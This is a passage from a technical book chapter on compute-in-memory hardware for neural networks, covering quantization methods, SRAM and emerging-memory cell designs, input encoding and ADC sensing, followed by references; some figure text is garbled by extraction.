or more of these three techniques, thereby becoming attractive for CIM imple-
mentation. The DoReFa network (Zhou et al. 2016), which utilizes all three
aforementioned techniques, reports satisfactory accuracy on ImageNet classification
with only 1-bit weight, 2-bit activation, and 6-bit gradient. The error obtained in EC
is floating-point, thus making this method only suitable for inference. At the same
time, DoReFa introduces tanh function in quantization, introducing more hardware
overhead. The extreme case for quantization is to use binary activation and weight
for convolution computations, such as BNN (Hubara et al. 2016) and XNOR-Net
(Rastegari et al. 2016). BNN directly quantizes the weight to the sign, while XNOR-
Net introduces a scaler per output channel on the weights’ sign. They both use
floating-point gradient and error for EC/GC/WU, making them a better choice for
inference than training. CIM inference chips based on XNOR are reported in Yin
et al. (2020a) and Liu et al. (2018).
A promising algorithm for training called WAGE is proposed in Wu et al.
(2018), whose name comes from the fact that the quantization is applied to weight,
activation, gradient, and error. An advantage of WAGE is that it uses fixed-
point quantization between the range of (−1,1) for weights and activations with
a precisely pre-calculated factor, which is friendly to hardware implementation.
The error is scaled with its max value, which introduces an overhead, but there
is no need to scale back and thus is a relaxed version of dynamic fixed-point.
With mixed-precision weight and stochastic quantization, WAGE could reduce the
precision of weight, activation, gradient, and error to 2, 8, 8, and 8 bits with no
loss for moderate tasks such as CIFAR-10 classification. Thus, in this algorithm,
the weight used for FF and EC process is 2-bit while an 8-bit high precision
version is needed for weight update according to 8-bit weight gradient. In the actual
hardware implementation, the work (Sun et al. 2018) uses the “volatile” gate voltage
of ferroelectric field-effect transistor (FeFET). The problem with WAGE is that
it suffers from performance loss when scaled to more complicated tasks such as
ImageNet classification. An improved WAGE version is proposed with dynamic
fixed-point used to replace original fixed-point quantization, achieving improved
accuracy but increasing hardware implementation complexity. It is an attractive
method for training as it considers the quantization for all the parties. Thus, some
CIM accelerators for training are proposed based on this algorithm (Jiang et al.
2020b).
While these quantization methods could be applied to the CIM architecture
in principle, they are mainly developed for the digital system where all the
calculations are done in full precision, even if precision might be low. However,
the MAC of CIM is implemented in the analog domain and needs to employ
19 Compute-in-Memory Architecture 667
ADCs to convert the analog partial sum to the digital value. Considering the
dynamic range and circuit complexity, it is impractical to use a full-precision ADC
according to output precision in most parallel reading cases. Furthermore, since
array partitioning is necessary for a large weight matrix, the quantization error (from
sub-arrays) introduced by the ADC will be further accumulated, which is usually not
considered in the quantization algorithms mentioned above. Thus, when mapping
the training/inference algorithm to the CIM system, one needs to consider the ADC
quantization effect on the performance. This will be discussed in detail in the latter
section when introducing the ADC circuits.
Device Technologies
SRAM
SRAM is widely used as the on-chip buffer in microprocessors and has enjoyed the
benefits of scaling together with logic transistors. With aggressive scaling, large on-
chip SRAM capacity has been demonstrated (e.g., 256 Mb SRAM demonstrated at
5 nm (Yeap et al. 2019)), which is possible to hold most of the weights on-chip.
Besides, because SRAM is more economical to write than eNVMs, it is suitable for
training tasks that need to update the weights frequently.
In theory, the conventional 6 T SRAM (shown in Fig. 11a) could be directly used
for CIM computation. For the MAC operation, the BL and BLB will be first pre-
charged. Then, the input will be applied on transistor T1 and T2 through WL with
weight bit represented by the value at node Q. When the input is “1”, the cell will
attempt to charge BL if Q is “1” and discharge BL if Q is “0”. When the input is “0”
668 H. Jiang et al.
Conventional 6T C_RWL
8T read decoupled 7T transposable (R_RBL)
RWL
T1 T2 T1 T2 T1 T2
T4
`
`
QB Q QB Q QB Q
(R_RWL)
RBL
C_RBL
T3 T3
WL
BLB BL WBLB WBL WBLB WBL
(a) (b) (c)
Fig. 11 SRAM cells used in CIM: (a) conventional 6 T SRAM; (b) read decoupled 8 T SRAM;
(c) transposable 7 T SRAM
for each row, T1 and T2 will be off, and Q/QB has no contribution to the current
on BL and BLB. When multiple rows are turned on, BL will decay from the power
supply VDD with different rates, and its voltage when the sense amplifier (SA)
is enabled represents the analog MAC result. This structure has two limitations.
One is the reliability issue called read-disturb when multiple rows are activated
simultaneously. For the regular 6 T SRAM read, only one cell is activated (thus, one
discharge path is connected to BL or BLB), causing either BL or BLB to decay. The
WL will be closed as long as the voltage difference is big enough for the SA output
to flip. Thus neither BL nor BLB will drop to a very low voltage value. However,
for the CIM mode, several cells will contribute to the discharge paths on both BL
and BLB, making the discharge rates much faster. When either BL or BLB is too
low, it will flip the nodes storing “1” that is connected to it. Since the voltage of BL
represents the analog MAC result, a high dynamic range is preferred. Read-disturb
limits the design range of the 6 T SRAM-based CIM. Another issue for the 6 T cell is
the asymmetric data pattern for partial sum accumulation. The product of input “1”
(applied to the pass-gate) and weight “0” (stored in the cell) has a different impact
on discharge current than the product of input “0” (applied to the pass-gate) and
weight “1” (stored in the cell). The analog output representing “0” varies according
to different input and weight data patterns. To eliminate the reference mismatch for
ADC quantization, input-aware dynamic reference generation is employed (Huang
et al. 2020a).
To be compatible with in-memory computation, the innovation of bit-cell design
is desired. Thus, a more practical choice for SRAM-based CIM is the 8 T read-
decoupled bit cell, as shown in Fig. 11b, at the noticeable expense of additional
layout area. The 8 T cell is originally designed for memory used to split the write
and read port to eliminate the write and read margin trade-off problem of the 6 T
SRAM. The two extra transistors (T3 and T4) in series on the read port form a
natural structure to support the multiplication of weight bit at node Q and input
applied through RWL. Only when both the input and weight bit are “1” will there
be a discharge path connected to RBL. In this case, the data pattern for weight
and input is symmetric since both are represented by the gate voltage. Also, since
the read is decoupled, it will not affect the data stored in the cell and has a larger
dynamic range.
19 Compute-in-Memory Architecture 669
Both the original 6 T and 8 T cells are not efficient for the training since the
input and output direction is not transposable. They could be modified to make
transposable read possible with extra transistors and BL/WL added. Some memory
designs will rotate the direction of the RWL and RBL in the 8 T read decoupled
cell, so the column read is supported through the additional read port while the row
read is still done by the original 6 T, suffering from read-disturb and asymmetric
data pattern problems. A low overhead 7 T transposable SRAM cell with decoupled
read on both directions is used for CIM computation in the work (Jiang et al. 2020a)
as shown in Fig. 11c. For the FF process, input is applied on C_RWL while weight
is applied on the gate of T3. When input and weight are both “1” a charge current
will be contributed to R_RWL. On the other hand, when the input is “0”, the input
is float instead of connected ground to avoid the asymmetric data pattern. C_RWL
and C_RBL exchange their roles for the EC process: C_RWL acts as R_RBL, and
C_RBL acts as R_RWL. R_RWL is enabled as neuron input and R_RBL is used
as bitline for partial sum read-out. Column and row paths can have separate sets of
ADCs for easy routing or one shared set of ADCs for area reduction. The drawback
of such a 7 T design is that the sneak paths may exist if the unselected rows/columns
are left floating. Other bit-cell variants are proposed to fulfill specific operational
requirements. For example, to map XNOR-Net to the CIM cell, both input and
weight are binarized to +1/−1. Although this two-state value could be represented
by a single bit, the multiplication between two bits is XNOR instead of AND. A
split-6 T cell design was proposed (Khwa et al. 2018) to support XNOR operation
in SRAM cells. Similar work also uses this structure to integrate XOR ciphers into
SRAM CIM architecture (Huang et al. 2020a). A variant of the design is 8 T-XNOR
bit-cell (Liu et al. 2018), where two additional pass-gate transistors crossly-coupled
BL and BLB to implement XNOR. Another design that implements XNOR-Net
uses a custom 12 T bit-cell with significant overhead (Yin et al. 2020a).
VIN_1 RS VIN_1
SL
WL VIN_2 WL
WL
BL BL
BL SL BL SL BL VIN_2 BL SL VIN_2
(a) (b) (c) RS
Fig. 12 Structure of eNVM-based arrays: (a) 1T1R cells based on the typical foundry embedded
memory design rule; (b) 1T1R based on a pseudo-crossbar array; (c) 1T1FeFET cells based on a
pseudo-crossbar array
Three-Terminal eNVM
Three-terminal NVM devices generally employ the transistor channel conductance
to represent the weight, which could be modulated by a tunable threshold voltage.
Representative three-terminal NVM is Flash memory based on floating-gate or
charge-trap cell. Owing to its extremely high write voltage (>20 V) and long write
latency (>10 μs), Flash memory is only applicable for inference design. On the other
hand, the emerging ferroelectric field-effect transistor (FeFET) is a more promising
solution. By modulating the polarization direction of the ferroelectric layer in the
gate stack, the threshold voltage could be changed and thus introduce different
channel conductance in the transistor. FeFET shows some highly desired features,
such as super high on/off ratio (>1000), relatively short programming pulse width
(<50 ns), and smoothness in the weight-update curve. Most importantly, scaled
FeFET with the field-driven mechanism will consume much lower programming
energy (∼fJ/bit) compared to RRAM or PCM (∼pJ/bit), which is current-driven.
The basic cell structure of FeFET for CIM is shown in Fig. 12c. During CIM read
operation, the input is applied to SL while the current is summed along BL. This is
similar to the configuration of the transposable CIM operation and thus could be
directly used for training. Unlike the 1T1R cell, which has a transistor in serial with
the resistor representing weights, the FeFET has an extra transistor connected to its
gate. The additional transistor is used as the selection control to skip the unselected
rows if the input is zero, as the weight being “1” in FeFET means negative threshold
voltage thus a floating gate voltage offered by the extra transistor is necessary to turn
off the channel.
19 Compute-in-Memory Architecture 671
One critical problem for training with eNVM devices is the asymmetric and
nonlinear weight update. For most eNVMs, the trajectory for potentiation and
degradation is nonlinear and asymmetrical (Chen et al. 2018b). As reported by
Sun and Yu (2019), the nonlinear but symmetrical update of weight conductance
will not cause a big accuracy loss for training. At the same time, the nonlinearity
combined with asymmetry will degrade the training performance a lot. An adaptive
momentum (Huang et al. 2020b) method could be used to compensate the non-
ideal conductance tuning. D2D variation, caused by varying device nonlinearity,
could also be compensated with a similar scheme. Circuit techniques such as adding
auxiliary transistors in the bit-cell (e.g., 2 T-1FeFET (Sun et al. 2018)) can also
make the update more linear. C2C variation is more problematic, thus further device
engineering to suppress the variation is desired. Besides, high device endurance is
preferred to support training on chip. It should be emphasized that the requirement
on the endurance cycle is also task-dependent, i.e., the number of weight update
iterations needed for convergence.
According to the basic structure of CIM sub-array (as shown in Fig. 1c), by applying
voltages Vi simultaneously to crossbar rows, multiplication is performed using
Ohm’s law between the device conductance and Vi to produce current Ii . Then
Ii from multiple rows is summed up through the column, representing the dot-
product. The possible bidirectional array design for training has a similar computing
manner, and the only difference is that the summing directions will be perpendicular.
CIM arrays typically have three design components: (1) memory array; (2) input
encoding; (3) output sensing. Circuit techniques for those components will be
introduced respectively.
Memory Modification
In old technology nodes (e.g., 65 nm), there is room to modify the bit cell and
reroute interconnection. But in advanced technology nodes (e.g., 28 nm or beyond),
foundries typically do not offer exceptions for making these changes for memory
design. Although it is possible to implement SRAM using the logic design rule, it
will not be as compact as the compact memory array design. Therefore, a viable
approach is to group the 6 T SRAM rows into memory banks and embed a row
of compute cells between banks to enable more sophisticated functions, as shown
in Fig. 13a. In this configuration, the 6 T SRAM is used as a memory cell only,
and the real computation is done in the compute cells. A group of compact 6 T
SRAMs is connected through local-bitline/local-bitline-bar (LBL/LBLB) for each
bank. The data from the 6 T SRAM cell is also sent to the compute cells through
LBL/LBLB. Thus, compute cells for banks could work in parallel during compute
mode without sacrificing throughput. All the banks are connected through global-
bitline/global-bitline-bar (GBL/GBLB). The normal cell read and write for the
19 Compute-in-Memory Architecture 673
6T 6T
6T 6T
LBLB
LBLB
LBL
LBL
Bank 1
LBL
HGBLB
6T 6T HGBL
GWL
N1
N3
Compute Cells
N2
N4
6T 6T
GBLB
6T 6T
GBL
LBLB
LBLB
LBL
LBL
Bank 2
6T 6T
GWL
(b)
Compute Cells
FWLM
N2
GBLB
GBLB
GBL
GBL
BWLM
LBL
C-RBL
BWLL
2x N1 N3
6T 6T
6T 6T 1x N4 N5
LBLB
LBLB
LBL
LBL
Bank n
6T 6T N6
GWL FWLL
Fig. 13 Memory modification for embedded computing cells to foundry rule defined 6 T SRAM
arrays: (a) memory banks with computing cells inserted; (b) compute cells supporting 4-bit input;
(c) compute cells supporting transpose read
memory array could be done through the GBL/GBLB. Figure 13b,c shows two
typical local-computing cell design (Si et al. 2020; Su et al. 2020). The design in
Fig. 13c is taken as an example to explain the functionality. In each input cycle,
a 2-bit input is applied to the gates of N1 and N4, corresponding MSB and LSB,
respectively. The N1-N3 pair and N4-N6 pair correspond to MSB multiplication
and LSB multiplication of input, respectively. The transistor width of N1-N3 is
designed to be twice of N4-N6, which enables the N1-N3 pair to produce a discharge
current twice of the N4-N6 branch. When the two currents of both N1-N3 and
N4-N6 pairs are summed up, the voltage swing contributed by the computing cell
is proportional to the result of multiplying 2-bit input and 1-bit weight. For the
backward calculation, the computation is performed in a perpendicular direction.
The advantage of such memory modification is that multi-bit MAC operation per
cycle or additional functionality (e.g., bidirectional read) could be implemented due
to the flexibility of computing cell design, enabling the use of foundry-provided
compact-rule cells.
Input Encoding
The inputs of neural networks are usually mapped as voltage pulses in the CIM
system. The input encoding scheme can be sorted into three types: amplitude-
based modulation, time-domain modulation, and binary encoding (as shown in
Fig. 14). For amplitude encoding, digital-to-analog converters (DACs) are essential
to encode the digital inputs as a voltage pulse of different amplitudes. Typical DAC
674 H. Jiang et al.
Digital inputs
Resistor/
Amplitude
capative
encoding
DAC
Input encoding
Digital inputs
Time
or Memory
encoding
PWM DAC array
MSB LSB
Digital inputs
Bit-serial
parallel
Binary processing
encoding
designs, including capacitive circuits and resistive ladders, will introduce additional
area overhead and power consumption. Multi-level input voltage could also be
implemented with multiple power supply sources to perform the multi-bit operation.
The introduced area overhead is small compared to the DAC approach, increasing
the load of the on-chip power unit. In general, the downside of such amplitude-
dependent encoding is that the number of voltage levels is limited by the narrow
signal swing in the voltage domain and the current-voltage linearity of the memory
cell.
For the time-domain modulation, the number of pulses can be directly encoded
as the input information. Alternatively, a pulse-width-modulation (PWM)-based
DAC can be hired to encode multi-bit inputs as varying pulse-widths. Naturally,
the computation time of time-dependent encoding is much longer than amplitude
encoding. However, compared to amplitude encoding, time encoding is much less
affected by the current-voltage nonlinearity, which makes it appealing to achieve
more accurate results. Additional advantages of PWM encoding are its simple single
voltage bias design and the ease of signal propagation between sub-arrays without
explicit ADC at the output node (Chang et al. 2019).
For binary encoding, multi-bit inputs are sent sequentially to the CIM array (i.e.,
bit-by-bit) and processed in a bit-serial parallel fashion. Additional circuits, such as
registers and shifters, are required to combine the sequential data. In such a way,
input DACs could be totally eliminated while hiring less expensive digital circuits.
Compared to time-dependent encoding, binary encoding offers higher throughput,
which is widely used in CIM designs. In practice, since the dynamic range of the
outputs from the circuits/devices is limited, inputs are usually limited to 1 ∼ 2 bit
per cycle, no matter which input encoding method is used.
19 Compute-in-Memory Architecture 675
Output Sensing
For the output sensing in most of today’s CIM designs, the memory array is
usually equipped with ADCs to convert analog MAC values to digital outputs. The
digital signal can be passed to the peripheral circuitry for further processing steps
such as activation function/pooling and then sent to the next array as the input.
This mixed-signal computing scheme offers scalability toward tiled hierarchical
designs via interconnect buses or network-on-chip while introducing additional
power dissipation and area overhead in the necessary data conversion at the array
outputs.
The raw output of a MAC operation performed by the CIM crossbar is typically
in the form of a current. Current-mode ADCs are required for direct sensing, while
voltage-mode ADCs can be employed after the current-to-voltage conversion. A
resistor divider or a trans-impedance amplifier (TIA) is commonly used to convert
the current to voltage. An ADC design plays an important role in CIM, as it has a
substantial contribution to the area/energy consumption of the CIM array. From
the algorithm’s viewpoint, although binary neural networks such as XNOR-Net
(Rastegari et al. 2016) may greatly reduce the required memory capacity and even
eliminate ADCs with simple binary sense amplifier (SA), multi-bit precision is a
more generic setting for large-scale DNNs to avoid inference accuracy degradation.
To reduce the overhead of ADCs, several alternatives have been proposed. One is
to share the ADC with multiple columns. As a penalty, the parallelism of CIM
will be reduced with lower throughput. The other solution is to lower the ADC
precision. However, the quantization loss of partial sum may hamper the accuracy
performance. Therefore, the choice of ADC topologies and configurations is critical
to the design of the CIM architecture. Several candidates of ADCs, such as Flash-
ADC (Yin et al. 2020a) and successive-approximation-register (SAR)-ADC (Chen
et al. 2018a), have been explored in prior CIM designs due to their simplicity and
suitability for low to medium precision.
As shown in Fig. 15a, Flash-ADC comprises cascading comparators. For an N-bit
converter, the circuit employs 2N − 1 comparators. The thermometer code generated
by comparators is then encoded into the digital output code. Flash-ADC is the fastest
ADC design in principle but consumes exponentially larger power and area when
the precision increases. Thus, Flash-ADC design in the resource-constrained CIM
architecture is usually restricted to low precision, such as 3-bit or below (Liu et al.
2018), to ensure good performance and is mostly used for small-scale arrays or
partially turned-on rows.
While Flash-ADC offers high speed, SAR-ADC is competitive due to its linearly
increased area/energy cost when the precision becomes higher. As shown in
Fig. 15b, SAR-ADC hires a single comparator but performs a one-bit comparison
only in one internal clock. Based on the binary search, the SAR logic (implemented
with multi-stage shift registers) will adjust the references dynamically and makes the
comparison in a bit-by-bit fashion. This sequence continues all the way from MSB
to LSB. Once all bits are done, the conversion is complete, and the N-bit digital
676 H. Jiang et al.
Vin
Flash ADC Analog shift-add ADC
SAR ADC
COMP
Digital Output
MAC value for multi-bit weight
DAC Digital
Column 1 (LSB): BL1
Analog
Reference Inputs
BL2
N-bit
SUM
Column N (MSB): BLN shift-add
SA
N
2 – 1 comparators
Dn-1 Dn-2 D1 D0
Output
COMP 2N C 2N-1 C 4C 2C 2C
Sign Bit
W[N-1]
Analog shift-add Block
COMP
W[1]
W[0]
Vin S/H
Vdd
COMP
C
2N 2N-1 C 4C 2C 2C
(a) (b) (c)
SUM
Fig. 15 (a) Diagram of Flash-ADC; (b) diagram of SAR-ADC; (c) diagram of analog shift-add
ADC. (With permission of Jiang et al. 2021)
output is available in the register. Typically, a capacitive DAC array that exploits the
charge redistribution is used to generate the analog reference voltage. To support
successive current-mode sensing, the multi-level current sense amplifier (ML-CSA)
is proposed in Chen et al. (2018a). The reference current (generated by the reference
array) input of each sensing step is selected by the previous output signal.
To reduce the ADC overhead, an analog shift-add approach for binary input
encoding is demonstrated in Su et al. (2020). The top-level diagram of the analog
shift-add ADC is shown in Fig. 15c. Here the shift-add process for weight precision
is moved prior to the ADC and is being conducted in the analog domain, which
is performed in a capacitor array. The charge redistribution nature of the capacitor
array is exploited to perform the weighted accumulation before ADC quantization.
Once the charge redistribution is stabilized, the pre-shifted and added MAC value
would be quantized by regular SAR-ADC to generate the final output that already
contains the weight significance. This design effectively eliminates the digital
shift-adders for multi-bit weight computation and reduces the MUXs of multiple
columns, thus improving the throughput and energy efficiency under the same area
constraint.
As aforementioned, quantization loss introduced by ADCs may decrease the
accuracy performance. To determine the minimally required ADC precision,
the impact of ADC quantization loss should be evaluated. In general, the smaller the
sub-array size and/or the lower the cell precision, the more relaxed the requirement
is on the ADC quantization. Figure 16 shows the analysis of the ADC quantization
effect on a CIFAR-10 classification task with a VGG-8 network (Peng et al. 2019).
For the smallest partial sum range case, which is a 64 × 64 array and 1-bit per cell,
the full precision of partial sum is 6-bit thus 5-bit ADC will introduce 1-bit loss.
It could be seen that for the same sub-array size, when the bit per cell increases,
the accuracy drops if using the same ADC precision. For the same cell and ADC
precision, the accuracy will drop accordingly as the sub-array size increases. In a
specific case, 5-bit ADC is necessary for 256 × 256 array size with a 4-bit/cell
design.
Figure 17 shows the accuracy performance vs. ADC precision for the conven-
tional ADC designs (representing both Flash- and SAR-ADC) and the proposed
19 Compute-in-Memory Architecture 677
90 90 90
Baseline: 92% Baseline: 92%
Baseline: 92%
60 60
Array Size Array Size Array Size
60 64x64 128x128 256x256
Fig. 16 Accuracy performance vs. ADC precision for different memory array configurations.
Simulations on VGG-8 network for CIFAR-10 dataset. (With permission of Peng et al. 2019)
100%
Analog shift-add ADC
Conventional ADCs
80% Baseline: 89%
Testing Accuracy (%)
60%
40%
20%
VGG-8 for CIFAR-10
0%
3 4 5 6 7
ADC precision
Fig. 17 Accuracy performance vs. ADC precision for analog shift-add ADC and conventional
ADCs. Simulations on VGG-8 network for CIFAR-10 dataset
analog shift-add ADC (Jiang et al. 2021). The assumption is 4-bit weight precision
(one bit per cell) with 512 × 512 memory sub-array, which means the full precision
of each column’s partial sum is 9-bit. Here Flash-ADC and SAR-ADC are grouped
together since they have the same dataflow in which ADCs first quantize partial
sums, and then digital shift-add modules are employed to accumulate digitized
partial sums. Oppositely, the analog shift-add ADCs first weigh and sum up the
analog multi-bit MAC outputs and then quantize the final output that already
contains the weight significance. These two different quantization approaches are
embedded in software simulation to investigate the impact of ADC quantization
loss on inference accuracy performance for the CIFAR-10 dataset.
678 H. Jiang et al.
For conventional ADCs, 3-bit quantization loss is tolerable. For analog shift-add
ADC, the full input precision for the partial sum is 13-bit (9-bit from column partial-
sum and 4-bit from shift-add for weight precision). From the plot, it is observed that
6-bit analog shift-add ADC could maintain baseline accuracy, actually tolerating
7-bit quantization loss. Analog shift-add ADC could tolerate more quantization loss
because quantization loss only happens at the final stage for analog shift-add ADC.
On the contrary, conventional ADCs have quantization loss on each partial sum
and then accumulate these quantized partial sums by shift-add, which means errors
will be accumulated. In sum, the analog shift-add before the ADC could preserve
more information, while the digital shift-add after the ADC may lose some residual
information, resulting in more errors in the final output. The trend would be similar
for different networks and tasks. Nevertheless, the ADC-induced accuracy loss
requires empirical simulations and case-dependent analysis for different datasets.
To reduce the ADC overhead and associated design efforts, some designs only
activate a part of the sub-array in parallel per cycle and use multiple cycles to
finish the MAC for the full array (e.g., (Li et al. 2021)). The ADCs used in these
designs could introduce no quantization loss theoretically since the full precision of
the par ADC quantization raises new challenges beyond quantization loss. Unlike
the precise quantization on the digital partial sum, the ADC quantization on the
analog signal could be noisy due to both static and dynamic uncertainties. The
static uncertainty could be introduced by the process variation, dominated by the
ADC offset caused by transistor mismatch. The ADC offset may cause quantization
errors when converting the analog partial sum to the digital signal. Thus it may
noticeably degrade the inference accuracy and cause different chip instances to
have different inference results even for the same input. As shown in Fig. 18,
a 5-bit Flash-ADC and a 5-bit SAR-ADC are evaluated by SPICE Monte Carlo
simulations using a foundry’s 40 nm PDK assuming local variations for an RRAM
CIM array. The error caused by the ADC offset will vary for different ADC types,
sense amplifier size (W/L), and the level of ADC output. Flash-ADC introduces
less error than SAR-ADC since with the same size sense amplifier on the same level
since Flash-ADC has multiple SAs to sense different levels in parallel. Thus the
error caused by them may compensate for each other, considering the summation
as the thermometer-to-binary (TM2B) encoder. For the same type of ADC, smaller
size for SA will be affected more by the process variation, thus introducing more
Fig. 18 Simulated ADC output with offset based on the sense pass rate for different W/L ratio.
Simulations on VGG-8 networks for CIFAR-10 dataset. (With permission of Huang et al. 2021)
19 Compute-in-Memory Architecture 679
Fig. 19 Measured ADC vs. ideal ADC outputs from a 90 nm RRAM CIM macro showing the
effectiveness of the reference fine-tuning. (With permission of Yin et al. 2020b)
error. The quantization error increases with the increase of the partial sum because
when the column current goes up, the effective resistance of the RRAM pull-down
networks decreases. Therefore, the voltage levels to be sensed are closer to each
other. Since the accuracy of SA highly decides the ADC error, one way to solve
this problem is to use more advanced offset-canceled SAs that could decrease the
mismatch caused by variation (Xue et al. 2019). On the other hand, since the static
offset will not change over time once the chip is fabricated, it could be compensated
by fine-tuning the ADC references (Yin et al. 2020b) or the model weights with
hybrid retraining on-chip (Huang et al. 2021). Figure 19 shows the error pattern of
eight 3-bit ADCs shared by 64 columns of an RRAM-based CIM chip fabricated
at 90 nm (Yin et al. 2020b). Figure 19a shows that when all the ADC use the same
reference set, the measured ADC output is much dispersed. The error decreases
significantly when each ADC has its own reference set, as shown in Fig. 19b.
Further increasing the number of reference sets to one set per column will introduce
marginal improvement, as shown in Fig. 19c, since one reference set per ADC could
fully compensate for the SA offset. However, it will introduce substantial hardware
overhead if every ADC reference needs fine-tuning. Another method to compensate
for the ADC offset is to perform the model retraining to adapt the weight patterns
to each chip’s ADC offset pattern. The hybrid retraining method will perform FF
on-chip while executing the EC and GC off-chip by software. Thus, the ADC
offset will be incorporated during the weight fine-tuning. Figure 20a, b shows an
example of CIFAR-10 classification on the VGG-8 network with 2-bit weight and
8-bit activation. The software accuracy after quantization is ∼92%. Considering
the ADC offset, the accuracy drops to 89.48% for W/L = 2, 90.26% for W/L = 3
and 89.91% for W/L = 4 when Flash ADC is used, while the accuracy drops to
81.65% for W/L = 2, 84.16% for W/L = 3 and 86.14% for W/L = 4 when SAR-
ADC is used. After the model retraining with weight fine-tuning, the accuracy will
recover to ∼91% for all the cases. Dynamic noise is mainly introduced by the
temporal effect, such as device read noise, VDD disturbance, etc. The dynamic
noise is much more difficult to be eliminated as it varies over time. In the ADC
quantization case, it means the current/voltage margin between levels in the sensing
node needs to be large enough to tolerate the noise. Figure 21 shows an example
680 H. Jiang et al.
Fig. 20 Retraining accuracy curves for inference chips equipped with Flash-ADC and SAR-ADC.
(With permission of Huang et al. 2021)
Fig. 21 Measured ADC vs. ideal ADC outputs with dynamic noise only from a 40 nm RRAM
CIM macro and the nonlinear mapping between the BL voltage and the expected ADC output
partial sum. (With permission of Li et al. 2021)
of 3-bit ADCs input/output mapping table for a 40 nm RRAM CIM array with
references fine-tuned measured over 10,000 input test vectors, which means ADC
offsets are already compensated (Li et al. 2021). In an ideal condition, the measured
ADC output should be the same as the measured one. However, dynamic errors are
introduced because of the dynamic noise. The noise affects higher partial sum levels
more than lower ones. This is because as the partial sum gets higher, the margin
between levels shrinks due to the nonlinear relationship between the sensing node
voltage and the partial sum current in a resistive divider configuration (Fig. 21b).
To improve the linearity, a current source with a feedback amplifier is proposed to
linearize the sensing voltage steps between the expected partial sum (Yoon et al.
2021). In addition, the noise-aware training (e.g., with noise injection) could be
used to converge the DNN model in a local minimum that is insensitive to the
hyperparameter deviation when the model is deployed to the hardware (Long et al.
2019). From both software accuracy and hardware cost point of view, it could be
seen that the performance of ADC is the key bottleneck for the CIM architectures.
19 Compute-in-Memory Architecture 681
training with noise injected to recover the performance loss caused by the non-
ideal effect of the circuit. Thus, this simulator could help designers to expand
the deterministic or stochastic noise design space for CIM design. With Pytorch
and TensorFlow wrapper, DNN+NeuroSim framework (Peng et al. 2019) can also
emulate DNN inference/training accuracy considering hardware limitations and
device non-idealities. Furthermore, the newly released 3D+ NeuroSim can support
electrical-thermal co-simulation of 3D-integrated CIM accelerators.
In general, the shift from conventional von Neumann architectures to CIM
architectures necessitates the rethinking of the whole framework from hardware
to software. The simulation platforms should bridge the gap between different
abstraction levels, including device, circuit, architecture, system, and accuracy sim-
ulation. Frequent update/calibration and integrating more functionalities are desired
to validate CIM implementations. With the development of CIM accelerators, the
simulators will also become more comprehensive and accurate.
Conclusion
preferred, and the non-ideal noises should be further reduced. At the device level,
SRAM suffers from leakage power for standby-frequent applications while eNVMs
exhibit the weaknesses of asymmetry/nonlinearity in weight update, variations, and
expensive write, which are undesired for in-situ training. As device process tech-
nology becomes more mature with extensive industrial research and development,
further enhancements in device characteristics are expected. Better linearity, more
levels of states, fewer variations, and longer endurance are all desired for delivering
the promises offered by CIM architectures.
References
Ambrogio S, Gallot M, Spoon K, Tsai H, Mackin C, Wesson M, Kariyappa S, Narayanan P, Liu
CC, Kumar A et al (2019) Reducing the impact of phase-change memory conductance drift on
the inference of large-scale hardware neural networks. In: IEEE international electron devices
meeting (IEDM)
Chang HY, Narayanan P, Lewis SC, Farinha NC, Hosokawa K, Mackin C, Tsai H, Ambrogio S,
Chen A, Burr GW (2019) AI hardware acceleration with analog memory: microarchitectures
for low energy at high speed. IBM J Res Dev 63(6):8–1
Chen Y (2020) ReRAM: history, status, and future. IEEE Trans Electron Devices 67(4):1420–1433
Chen YH, Krishna T, Emer JS, Sze V (2016) Eyeriss: a spatial architecture for energy-efficient
dataflow for convolutional neural networks. IEEE J Solid State Circuits 52(1):127–138
Chen WH, Li KX, Lin WY, Hsu KH, Li PY, Yang CH, Xue CX, Yang EY, Chen YK, Chang YS,
Hsu TH (2018a) A 65nm 1Mb nonvolatile computing-in-memory ReRAM macro with sub-16ns
multiply-and-accumulate for binary DNN AI edge processors. In: IEEE international solid-state
circuits conference (ISSCC)
Chen PY, Peng X, Yu S (2018b) NeuroSim: a circuit-level macro model for benchmarking neuro-
inspired architectures in online learning. IEEE Transactions on Computer-Aided Design of
Integrated Circuits and Systems 37(12):3067–3080
Chi P, Li S, Xu C, Zhang T, Zhao J, Liu Y, Wang Y, Xie Y (2016) Prime: a novel processing-in-
memory architecture for neural network computation in reram-based main memory. In: 43rd
annual international symposium on computer architecture (ISCA), vol 44, p 27
Courbariaux M, Bengio Y, David JP (2015) Training deep neural networks with low precision mul-
tiplications. In: Workshop contribution at international conference on learning representations
(ICLR)
DeHon A (2000) The density advantage of configurable computing. Computer 33(4):41–49
Dong X, Xu C, Xie Y, Jouppi NP (2012) Nvsim: a circuit-level performance, energy, and area
model for emerging nonvolatile memory. IEEE Trans Comput-Aided Des Integr Circuits Syst
31(7):994–1007
Elliott DG, Stumm M, Snelgrove WM, Cojocaru C, Mckenzie R (1999) Computational RAM:
implementing processors in memory. IEEE Des Test Comput 16(1):32–41
Feng Y, Chen B, Liu J, Sun Z, Hu H, Zhang J, Zhan X, Chen J (2021) Design-technology co-
optimizations (DTCO) for general-purpose computing in-memory based on 55nm NOR flash
technology. In: IEEE international electron devices meeting (IEDM)
Gao L, Chen PY, Liu R, Yu S (2016) Physical unclonable function exploiting sneak paths in
resistive cross-point array. IEEE Transactions on Electron Devices 63(8):3109–3115
Giannopoulos I, Sebastian A, Le Gallo M, Jonnalagadda V, Sousa M, Boon M (2018) 8-bit
precision in-memory multiplication with projected phasechange memory. In: IEEE international
electron devices meeting (IEDM)
Gokmen T, Onen M, Haensch W (2017) Training deep convolutional neural networks with resistive
cross-point devices. Front Neurosci 11:538
684 H. Jiang et al.
He Z, Lin J, Ewetz R, Yuan JS, Fan D (2019) Noise injection adaption: end-to-end ReRAM cross-
bar non-ideal effect adaption for neural network mapping. In: ACM/IEEE design automation
conference (DAC)
Huang S, Jiang H, Peng X, Li W, Yu S (2020a) XOR-CIM: compute-in-memory SRAM
architecture with embedded XOR encryption. In: IEEE/ACM international conference on
computer-aided design (ICCAD)
Huang S, Sun X, Peng X, Jiang H, Yu S (2020b) Overcoming challenges for achieving high
in-situ training accuracy with emerging memories. In: Design, Automation & Test in Europe
Conference & Exhibition (DATE)
Huang S, Peng X, Jiang H, Luo Y, Yu S (2021) Exploiting process variations to protect machine
learning inference engine from chip cloning. In: IEEE international symposium on circuits and
systems (ISCAS)
Hubara I, Courbariaux M, Soudry D, El-Yaniv R, Bengio Y (2016) Binarized neural networks. In:
Conference on neural information processing systems (NIPS)
